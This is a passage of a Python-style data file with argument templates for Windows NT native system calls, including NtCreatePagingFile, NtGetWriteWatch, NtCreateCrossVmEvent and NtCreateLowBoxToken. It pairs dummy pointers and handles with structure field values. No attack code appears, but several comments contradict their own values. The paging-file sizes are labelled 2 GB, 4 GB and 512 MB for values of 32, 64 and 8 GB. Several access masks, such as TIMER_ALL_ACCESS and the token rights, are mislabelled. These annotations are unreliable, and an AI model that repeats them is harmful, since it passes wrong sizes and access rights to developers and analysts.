\"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd0060\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer, named partition)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtManagePartition\": {\r\n \"ntFunc\": \"NtManagePartition\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"PartitionInformationLength (example: 32 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to PartitionInformation buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"PARTITION_INFORMATION_CLASS (example: PartitionBasicInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE SourceHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000555\",\r\n \"additionalComment\": \"HANDLE TargetHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtMapUserPhysicalPages\": {\r\n \"ntFunc\": \"NtMapUserPhysicalPages\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to ULONG_PTR UserPfnArray (dummy pointer, typically array of page frame numbers)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"NumberOfPages (example: 16 pages)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00500000\",\r\n \"additionalComment\": \"VirtualAddress (example: base address to map physical pages)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAllocateUserPhysicalPagesEx\": {\r\n \"ntFunc\": \"NtAllocateUserPhysicalPagesEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ULONG ExtendedParameterCount (requesting 2 extended parameters)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to MEM_EXTENDED_PARAMETER array (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0100\"\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to ULONG_PTR UserPfnArray (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to ULONG_PTR NumberOfPages (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtGetWriteWatch\": {\r\n \"ntFunc\": \"NtGetWriteWatch\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to ULONG Granularity (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00001000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to ULONG_PTR EntriesInUserAddressArray (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000008\"\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to PVOID UserAddressArray (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00400000\"\r\n },\r\n {\r\n \"value\": \"0x00002000\",\r\n \"additionalComment\": \"SIZE_T RegionSize (8 KB region)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00400000\",\r\n \"additionalComment\": \"PVOID BaseAddress (typical image base)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG Flags (WRITE_WATCH_FLAG_RESET)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtResetWriteWatch\": {\r\n \"ntFunc\": \"NtResetWriteWatch\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00002000\",\r\n \"additionalComment\": \"SIZE_T RegionSize (8 KB region)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00400000\",\r\n \"additionalComment\": \"PVOID BaseAddress (typical image base)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreatePagingFile\": {\r\n \"ntFunc\": \"NtCreatePagingFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER ActualSize (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct82\",\r\n \"structureValueExpectations\": \"Actual size of the paging file in bytes.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER MaximumSize (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct83\",\r\n \"structureValueExpectations\": \"Maximum size of the paging file in bytes.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER MinimumSize (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct84\",\r\n \"structureValueExpectations\": \"Minimum size of the paging file in bytes.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING PageFileName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct85\",\r\n \"structureValueExpectations\": \"Path to the paging file.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct82\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000800000000\",\r\n \"fieldComment\": \"Actual size: 2 GB\"\r\n }\r\n ]\r\n },\r\n \"struct83\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000001000000000\",\r\n \"fieldComment\": \"Maximum size: 4 GB\"\r\n }\r\n ]\r\n },\r\n \"struct84\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000200000000\",\r\n \"fieldComment\": \"Minimum size: 512 MB\"\r\n }\r\n ]\r\n },\r\n \"struct85\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Length in bytes (16 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0040\",\r\n \"fieldComment\": \"Buffer capacity in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd00c0\",\r\n \"fieldComment\": \"Pointer to paging file path string (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCancelIoFileEx\": {\r\n \"ntFunc\": \"NtCancelIoFileEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct86\",\r\n \"structureValueExpectations\": \"Receives I/O completion status.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK IoRequestToCancel (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct87\",\r\n \"structureValueExpectations\": \"Pointer to I/O request to cancel.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct86\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Operation status (initialized to STATUS_SUCCESS)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Operation-specific information\"\r\n }\r\n ]\r\n },\r\n \"struct87\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0xc0000120\",\r\n \"fieldComment\": \"STATUS_CANCELLED\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Operation-specific information\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCancelWaitCompletionPacket\": {\r\n \"ntFunc\": \"NtCancelWaitCompletionPacket\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BOOLEAN RemoveSignaledPacket (FALSE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000cafe\",\r\n \"additionalComment\": \"HANDLE WaitCompletionPacketHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateWaitCompletionPacket\": {\r\n \"ntFunc\": \"NtCreateWaitCompletionPacket\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES ObjectAttributes (None, default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00100001\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (SYNCHRONIZE | GENERIC_READ)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to HANDLE WaitCompletionPacketHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCompareObjects\": {\r\n \"ntFunc\": \"NtCompareObjects\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x0000beef\",\r\n \"additionalComment\": \"HANDLE Handle2 (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000cafe\",\r\n \"additionalComment\": \"HANDLE Handle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCompareTokens\": {\r\n \"ntFunc\": \"NtCompareTokens\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to BOOLEAN Equal (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x0000beef\",\r\n \"additionalComment\": \"HANDLE SecondTokenHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000cafe\",\r\n \"additionalComment\": \"HANDLE FirstTokenHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtContinueEx\": {\r\n \"ntFunc\": \"NtContinueEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PKCONTINUE_ARGUMENT ContinueArgument (None, default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PCONTEXT ContextRecord (None, default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateCrossVmEvent\": {\r\n \"ntFunc\": \"NtCreateCrossVmEvent\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to GUID (dummy pointer, typically None unless cross-VM event is named)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Unknown parameter, typically None\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Unknown ULONG parameter, typically 0\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer, often None for unnamed event)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct88\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0003\",\r\n \"additionalComment\": \"DesiredAccess (EVENT_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to HANDLE EventHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct88\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (unnamed event)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCreateCrossVmMutant\": {\r\n \"ntFunc\": \"NtCreateCrossVmMutant\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to GUID (dummy pointer, typically None unless cross-VM mutant is named)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Unknown parameter, typically None\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Unknown ULONG parameter, typically 0\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer, often None for unnamed mutant)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct89\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0001\",\r\n \"additionalComment\": \"DesiredAccess (MUTANT_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to HANDLE MutantHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct89\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (unnamed mutant)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCreateDirectoryObjectEx\": {\r\n \"ntFunc\": \"NtCreateDirectoryObjectEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Flags (typically 0 for default behavior)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ShadowDirectoryHandle (typically None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer, usually required for named directory)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct90\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000F000F\",\r\n \"additionalComment\": \"DesiredAccess (DIRECTORY_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to HANDLE DirectoryHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct90\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd00e0\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer for directory name)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCreateIRTimer\": {\r\n \"ntFunc\": \"NtCreateIRTimer\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00100000\",\r\n \"additionalComment\": \"DesiredAccess (TIMER_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to HANDLE TimerHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateLowBoxToken\": {\r\n \"ntFunc\": \"NtCreateLowBoxToken\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to LowBoxStruct (dummy pointer, typically a structure describing the lowbox)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"LowBoxCount (number of entries in LowBoxStruct, typically 1)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"Pointer to SID_AND_ATTRIBUTES Capabilities (dummy pointer, typically None if no capabilities)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"CapabilityCount (typically 0 if Capabilities is None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"Pointer to SID AppContainerSid (dummy pointer, typically None if not using AppContainer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00c0\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer, often None for default token)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct91\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00020000\",\r\n \"additionalComment\": \"DesiredAccess (TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n 